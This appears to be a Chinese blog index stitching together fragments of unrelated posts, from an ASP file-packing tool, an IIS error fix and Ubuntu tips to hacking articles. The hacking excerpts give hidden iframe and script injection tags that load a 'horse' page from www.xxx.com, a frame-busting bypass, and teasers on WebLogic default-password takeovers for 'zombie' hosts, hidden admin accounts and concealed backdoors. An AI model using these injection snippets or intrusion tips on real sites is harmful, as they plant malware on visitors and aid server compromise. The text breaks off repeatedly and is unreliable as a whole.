使用ASP将文件打包为XML文件(带解包) 工具可以将多个文件打包成一个XML文件，当然，也可以解包将其还原成原本的文件。这有什么作用呢？比如可以将一个站点的所有文件打包成一个XML文件，上传至服务器再解包，这会比从本地将所有文件上传至服务器快多了。

解压包中有三个文件Packa.asp、Packb.asp和Un_Pack.asp：

Packa.asp：打包工具(将指定文件夹的内容打包为单一XML文件)
Packb.asp：打包工具(将当前文件的内容打包为单一XML文件)
Un_Pack.asp：解包工具(将XML文件解包到当前文件夹中)

在学校调试asp程序，或者服务器课上配置IIS，有时候就会碰到这该死的“HTTP 500 - 内部服务器错误”，怎么都搞不定，让夜火我好是火大，刚好在AK那看到这个HTTP 500 - 内部服务器错误 解决方法，转来记录之：

培训销售人员安装asp.net运行环境，真是各种情况都遇到了，IIS安装完成，一运行出现“HTTP 500 - 内部服务器错误”，网上找了一圈，处理方法那个叫复杂，在研究完复杂方法之后，发现只要三步就可以解决问题了。

最近夜火我在折腾Ubuntu 9.04系统，直接硬盘安装在学校的机器上，已经折腾了3天了。

第一天全放在了重装windows XP和安装整理必要文件上了；第二天安装了GRUB4DOS，硬盘引导加载 Ubuntu-9.04-desktop-i386.iso 文件安装Ubuntu，但是装好之后一直memtest内存测试，引导不进系统；这第三天又捣鼓了1天的grub，最终还是不行，没有vmlinuz-2.6.28-11-generic文件。明天继续。。。

学校的破网络，只能上百度首页和看PPS，其他什么都不能干，资料要回家查，软件要U盘带，估计装好ubuntu也apt-get不到什么东西，不过还是要折腾，谁让咱移民去了不折腾会死星那。当然，在折腾的过程中，学到了不少东西。

趁着空闲，收集一些linux实用技巧，以备后查：Linux 下用ps查找进程并用kill终止命令详解

Linux是强大的，Ubuntu又是Linux桌面发行版里最流行的版本，Linux或Ubuntu里的功能有很多，也许有一些很好用的你不知道的技巧/功能/软件藏身在系统的某处，这里转来 Ubuntu 小技巧10则 ，分享给大家。

原文作者近期刚开始与他的合作者合著一本关于Ubuntu技巧的书，目前定名为《Ubuntu功夫》。不过这本书可能要到明年才会出版，作者先给出了以下10条技巧。这些技巧并不一定仅仅是在Ubuntu上才可以使用，只是在Ubuntu这种Linux发行版下经过验证的。

aptitude 与 apt-get 同样是 Debian 及其衍生系统中功能极其强大的包管理工具。很多命令都类似于 apt-get ，因此很容易掌握。

但与 apt-get 不同的是，aptitude 在处理依赖问题上更佳一些。像 aptitude 在删除一个包时，会同时删除本身所依赖的包。这样，系统中不会残留无用的包，整个系统更为干净。

以下是一些常用 aptitude 命令，仅供参考：……

1.挂马的N种方法

(1) HTML挂马法。
常规的HTML挂马方法一般是在网页中插入一条iframe语句，像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>。查看站点是否被挂，一般是查找一下关键词iframe。

(2) 再隐藏一点的就是js挂马了。
像再原来的网页中写入<script str=http://www.xxx.com/horse.js></script>，horse里的js写法一般为 document.write(’http://www.xxx.com/horse.html’>;，或者专业一点的写法是 top.document.body.innerHTML  = top.document.body.innerHTML + ‘ <inframe src=”http://www.xxx.com/horse.htm/”></iframe>’;。不过第2种写法要注意：是原来的网页种要有body标签。

(3)......

iframe的防插与强插，网上通用的防插那版是（子）：

if(top.location != self.location){
top.location = self.location;
}

强插方案为（父）：
 

var location="";

其中这个location是对被赋值的top.location方法的覆盖，导致方法失效。

......

黑客们发现发现，用来制作网页特效的CSS代码，也可以用来做CSS挂马。

随着Web2.0的普及，各种网页特效用得越来越多，这也给黑客一个可乘之机。他们发现，用来制作网页特效的CSS代码，也可以用来挂马。而比较讽刺的是，CSS挂马方式其实是从防范E挂马的CSS代码演变而来。

题目：WebLogic简单抓鸡大法
作者：Mickey [I.S.T.O.]&hackest [H.S.T.]

此文章已发表在《黑客X档案》2008年第11期杂志上
后经作者发布在博客上，如转载请务必保留此信息！

Tomcat估计给很多人带来了N多肉鸡服务器了吧，直接扫描弱口令，进入Tomcat管理后台，上传Webshell就得到一台肉鸡服务器了，操作之简单，效率之高，实在是抓鸡必备！不过这次要介绍的是一个类似于Tomcat的JSP支持平台WebLogic漏洞的简单利用（其实也是默认口令），相比Tomcat会稍微复杂一些，不过操作起来也是比较容易的。

一、如何在图形界面建立隐藏的超级用户

　　图形界面下适用本地或开3389终端服务的肉鸡上。以前我提到过的那位作者说的方法很好，但是较为复杂，还要用到psu.exe(让程序以系统用户身份运行的程序)，如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为Windows 2000有两个注册表编辑器

渗透的服务器也多了，起初都是给肉鸡装上鸽子啊，PCSHARE什么的，以为这样就OK了，但是往往到了第二天就不翼而飞，我起初很纳闷，我的后门都是免X的，管理员是怎么样发现我的踪迹的呢？后来慢慢积累了些心得，现发出来跟大家分享一下。

这个机器有多古老？4.6-RELEASE FreeBSD，没有gcc，没有make，连系统都乱七八糟的，port都不好使，pkg_add -r安装包都会有问题，真是无语了，还好有安装了一个Perl 5.8.8。修理Port花了半天时间，硬是没搞好。想想也不划算，把紧急要用的一些小工具花一会儿功夫自己做一个出来算了，于是有了这个简单的Perl 版NC，不过我没支持-e参数，用不着。